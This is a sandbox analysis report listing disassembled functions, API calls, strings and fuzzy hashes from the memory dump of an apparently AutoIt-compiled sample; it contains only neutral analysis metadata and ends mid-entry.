                                                                        • API String ID: 2438371351-0
                                                                        • Opcode ID: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
                                                                        • Instruction ID: 886c04b23a6a4efe9c5f5b8d853a9e78a0b4d604f1575f94700f31c3be8f966b
                                                                        • Opcode Fuzzy Hash: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
                                                                        • Instruction Fuzzy Hash: 5062F930A14258DBEB24CFA4C950BDEB376EF58304F1091A9D10DEB3A1E7799E81CB59
                                                                        Function 00451D2B Relevance: 6.4, APIs: 4, Instructions: 405COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                        • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                                                        • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                        • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                                                        Function 00479500 Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VariantInit.OLEAUT32(?), ref: 0047950F
                                                                        • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                                        • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                                        • VariantClear.OLEAUT32(?), ref: 00479650
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$AllocClearCopyInitString
                                                                        • String ID:
                                                                        • API String ID: 2808897238-0
                                                                        • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                        • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                                        • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                        • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                                        Function 0040BD80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID: Error:
                                                                        • API String ID: 4104443479-232661952
                                                                        • Opcode ID: 0f3a33fb7be69c8e6baf3b23b87111ea2728d16161c2c78c6bada8bccab6f67e
                                                                        • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                                        • Opcode Fuzzy Hash: 0f3a33fb7be69c8e6baf3b23b87111ea2728d16161c2c78c6bada8bccab6f67e
                                                                        • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                                        Function 0040F520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                          • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                          • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                          • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                                          • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                          • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                                          • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                                        • String ID: X$pWH
                                                                        • API String ID: 85490731-941433119
                                                                        • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                        • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                                        • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                        • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                                        Function 00401B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • _memmove.LIBCMT ref: 00401B57
                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                                        • String ID: @EXITCODE
                                                                        • API String ID: 2734553683-3436989551
                                                                        • Opcode ID: d09de110ff079f104ffdf991df362542016b83ce61c8771042b9fd4bbac4f926
                                                                        • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                                        • Opcode Fuzzy Hash: d09de110ff079f104ffdf991df362542016b83ce61c8771042b9fd4bbac4f926
                                                                        • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                                        Function 00414ABA Relevance: 4.7, APIs: 3, Instructions: 160COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                                        • String ID:
                                                                        • API String ID: 1794320848-0
                                                                        • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                        • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                                        • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                        • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                                        Function 0040E0C0 Relevance: 4.6, APIs: 3, Instructions: 82windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: IconNotifyShell_
                                                                        • String ID:
                                                                        • API String ID: 1144537725-0
                                                                        • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                        • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                                                        • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                        • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                                                        Function 0043213D Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _malloc.LIBCMT ref: 0043214B
                                                                          • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                          • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                          • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                        • _malloc.LIBCMT ref: 0043215D
                                                                        • _malloc.LIBCMT ref: 0043216F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _malloc$AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 680241177-0
                                                                        • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                        • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                                        • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                        • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                                        Function 00409519 Relevance: 4.5, APIs: 3, Instructions: 31windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • TranslateMessage.USER32(?), ref: 00409556
                                                                        • DispatchMessageW.USER32(?), ref: 00409561
                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Message$DispatchPeekTranslate
                                                                        • String ID:
                                                                        • API String ID: 4217535847-0
                                                                        • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                                        • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                                                                        • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                                        • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                                                                        Function 0040F570 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 247COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                                        • _free.LIBCMT ref: 004295A0
                                                                          • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                          • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                          • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                                          • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                                          • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                                          • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                                        • String ID: >>>AUTOIT SCRIPT<<<
                                                                        • API String ID: 3938964917-2806939583
                                                                        • Opcode ID: d5425b4d5d373cd3c9aada33d69f001194155828563bb979a690d8301bd6116d
                                                                        • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                                        • Opcode Fuzzy Hash: d5425b4d5d373cd3c9aada33d69f001194155828563bb979a690d8301bd6116d
                                                                        • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                                        Function 00410100 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _strcat
                                                                        • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                        • API String ID: 1765576173-2684727018
                                                                        • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                        • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                                        • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                        • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                                        Function 0040AFA0 Relevance: 3.3, APIs: 2, Instructions: 258COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ClearVariant
                                                                        • String ID:
                                                                        • API String ID: 1473721057-0
                                                                        • Opcode ID: 06b95c7d932ab2db27afc4e2bded0b91782a390f2a18feecbc4632e93325d32e
                                                                        • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                                                                        • Opcode Fuzzy Hash: 06b95c7d932ab2db27afc4e2bded0b91782a390f2a18feecbc4632e93325d32e
                                                                        • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                                                                        Function 00467AC4 Relevance: 3.1, APIs: 2, Instructions: 130COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID:
                                                                        • API String ID: 4104443479-0
                                                                        • Opcode ID: bd136d67b55beea3429463d3d4f7789442ca244e86e209309dc7216971c9ef38
                                                                        • Instruction ID: 2565b1472f88146c75409e19c065a4aacb94a5f6c219594ae44f545f2623c2f3
                                                                        • Opcode Fuzzy Hash: bd136d67b55beea3429463d3d4f7789442ca244e86e209309dc7216971c9ef38
                                                                        • Instruction Fuzzy Hash: 85412871D00104AFDB10AF15C881BAE7B74AF4670CF14C05AFA055B342E63DA946CBAA
                                                                        Function 0040F760 Relevance: 3.1, APIs: 2, Instructions: 92COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                                          • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                                          • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                                        • _strcat.LIBCMT ref: 0040F786
                                                                          • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                                          • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                                        • String ID:
                                                                        • API String ID: 3199840319-0
                                                                        • Opcode ID: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                                        • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
